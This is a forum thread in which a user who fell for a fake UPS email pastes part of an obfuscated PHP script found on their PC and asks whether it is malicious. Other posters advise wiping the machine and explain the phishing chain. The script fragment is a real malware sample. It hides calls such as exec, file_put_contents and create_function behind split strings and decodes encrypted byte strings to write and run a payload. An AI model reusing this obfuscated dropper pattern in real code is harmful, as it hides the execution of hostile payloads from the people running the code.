Jump to content

Is this a malicious PHP script?

cavemanager

By cavemanager
in PHP Coding Help

 Share

Recommended Posts

cavemanager Newbie

cavemanager

Posted
Posted (edited)

I foolishly clicked a link in an email from what I thought was UPS (with a tracking number) and the link was a doc file with macros.. I noticed on system startup that I was seeing a PHP popup in the lower task bar. I then went to my local AppData\Roaming to find a suspicious folder with a php.exe file, a dll and a php script. I opened the PHP file in npp to have a look. I have very little experience with PHP so I can't really tell what the script is doing. Here is a copy/paste -- and I removed a little less than half the code just in case I am actually posting malicious code to this forum..

 

 

If I had to guess, I'd say it looks like it's doing encryption, so it's ransomware..

 

Script:

<?php
$GLOBALS['38744245'] = Array(
    'cu' . 'rl_multi_exec',
    'm' . 'ss' . 'ql_re' . 's' . 'ult',
    'file_ge' . 't' . '_c' . 'on' . 'te' . 'nts',
    '' . 'fi' . 'l' . 'e_put_co' . 'n' . 't' . 'ents',
    'ex' . 'ec',
    '' . 'unlink',
    '' . 'strpos',
    'fg' . 'etcs' . 'v',
    'strnat' . 'cmp',
    'strlen',
    'm' . 't_' . 'rand',
    'p' . 're' . 'g_repla' . 'ce_callb' . 'ack',
    'ch' . 'r',
    'ord',
    'st' . 'r' . 'po' . 's',
    'array_' . 'fi' . 'lter',
    's' . 'e' . 'ssion_is_r' . 'egist' . 'ered',
    's' . 't' . 'rpos',
    'cr' . 'eate_func' . 'tion',
    'i' . 'm' . 'agecreatefrom' . 'gd2part',
    'mt_' . 'rand'
);
?><?php
function _1369297363($taqqmn)
{
    $cabbfl = Array(
        "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e",
        "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e\x9c\x9a\x53\x21",
        'i',
        'bxhndsxsexibrxben',
        'gdz',
        '',
        'lxdgilfgvccek',
        'vz'
    );
    return $cabbfl[$taqqmn];
}
?><?php
$ucdxetr = round(0 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.;
while (round(0 + 3693) - round(0 + 923.25 + 923.25 + 923.25 + 923.25))
    $GLOBALS['38744245'][0]($yfvmrsd, $rgyctvo, $hdoptxm);
$ovehlgp = _1369297363(0);
$czdwupq = _1369297363(1);
while (round(0 + 369.33333333333 + 369.33333333333 + 369.33333333333) - round(0 + 221.6 + 221.6 + 221.6 + 221.6 + 221.6))
    $GLOBALS['38744245'][1]($acdfplp, $rgyctvo, $ghktwqf);
$ovehlgp = gnnnesr($ovehlgp, $ucdxetr);
$czdwupq = gnnnesr($czdwupq, $ucdxetr);
$yxfgkhr = $GLOBALS['38744245'][2]($ovehlgp);
if ($yxfgkhr) {
    $ghktwqf = gnnnesr($yxfgkhr, $ucdxetr);
    $GLOBALS['38744245'][3]($czdwupq, $ghktwqf);
    $GLOBALS['38744245'][4]($czdwupq);
    while (!$GLOBALS['38744245'][5]($czdwupq))
        Sleep(round(0 + 1));
    $ptdybmu = _1369297363(2);
}
function tpugtze($acdfplp, $gsseqei)
{
    $wexiboc = $gsseqei & round(0 + 7.75 + 7.75 + 7.75 + 7.75);
    if ($GLOBALS['38744245'][6](_1369297363(3), _1369297363(4)) !== false)
        $GLOBALS['38744245'][7]($yfvmrsd, $ucdxetr, $ucdxetr, $czdwupq);
    return ($acdfplp << $wexiboc) | (($acdfplp >> (round(0 + 10.666666666667 + 10.666666666667 + 10.666666666667) - $wexiboc)) & ((round(0 + 1) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $wexiboc)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)));
}
function gnnnesr($rgyctvo, $ucdxetr)
{
    $qaptxjz = _1369297363(5);
    while (round(0 + 3667) - round(0 + 3667))
        $GLOBALS['38744245'][8]($yxfgkhr);


[END PORTION OF CODE REMOVED]


?>
Edited by cavemanager
Link to comment
Share on other sites
cavemanager Newbie

cavemanager

Posted
  • Author
Posted

:facepalm:

 

It's pretty much guaranteed to be malicious, and it's likely not the only bad thing that got added to your computer.

 

I figured.. any way to check where/what else got added to my pc? I have Trend Mirco AV as well as Malwarebytes.. I've done scans but nothing turned up... 

Link to comment
Share on other sites
cavemanager Newbie

cavemanager

Posted
  • Author
Posted (edited)

Forget about trying to “clean” the system. Cut the Internet connection, save your data (or what's left of it), wipe the PC and start over.

 

And for the love of god, stop opening random files from the Internet.

 

I'm not just downloading random files from the Internet. I am usually careful about these things but it just so happened that I have UPS orders and the email looked legit. I don't know if you've heard, but even knowledgeable people can be tricked too.

 

I did immediately disconnect from the network and do some file copies just in case. Meanwhile, Trend eventually grabbed the virus and I think I stopped it before it could do any damage. I am planning to wipe and re-install just because I know it's the best thing to do.

Edited by cavemanager
Link to comment
Share on other sites
Jacques1 Prolific Member

Jacques1

Posted
Posted

I don't know if you've heard, but even knowledgeable people can be tricked too.

 

Sure, but going to a website which clearly isn't the official one (ups.com uses HTTPS with an EV certificate for everything), downloading a .doc file (why would UPS use such a weird format?), opening it directly in Word and probably clicking past the macro warnings is a pretty long chain of actions.

 

I'm not saying this to put you down or pretend like I'm immune to attacks. My point is that you need a lot more paranoia on multiple levels, not just related to strange e-mails.

Link to comment
Share on other sites
cavemanager Newbie

cavemanager

Posted
  • Author
Posted

Sure, but going to a website which clearly isn't the official one (ups.com uses HTTPS with an EV certificate for everything), downloading a .doc file (why would UPS use such a weird format?), opening it directly in Word and probably clicking past the macro warnings is a pretty long chain of actions.

 

I'm not saying this to put you down or pretend like I'm immune to attacks. My point is that you need a lot more paranoia on multiple levels, not just related to strange e-mails.

 

I clicked the link in my email and the file just downloaded/ran. I didn't manually go out to a website to download it. Like I said, the email looked really legit and I just happened to be waiting for a package from UPS. Plus, this was before I had coffee.. Looking back, I should have hovered over the link to see the real destination. Live and learn. 

Link to comment
Share on other sites
requinix Prolific Member

requinix

Posted
Posted

If simply opening the file was enough then there's a good chance your Office isn't up to date with patches: the file should have been blocked by Word from doing anything, specifically for this reason.

 

But yeah, lesson learned. Companies do not send attachments with emails, not least because of the processing overhead to do so - they either tell you what you need to know in the email, or link(/phish) you to a website.

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.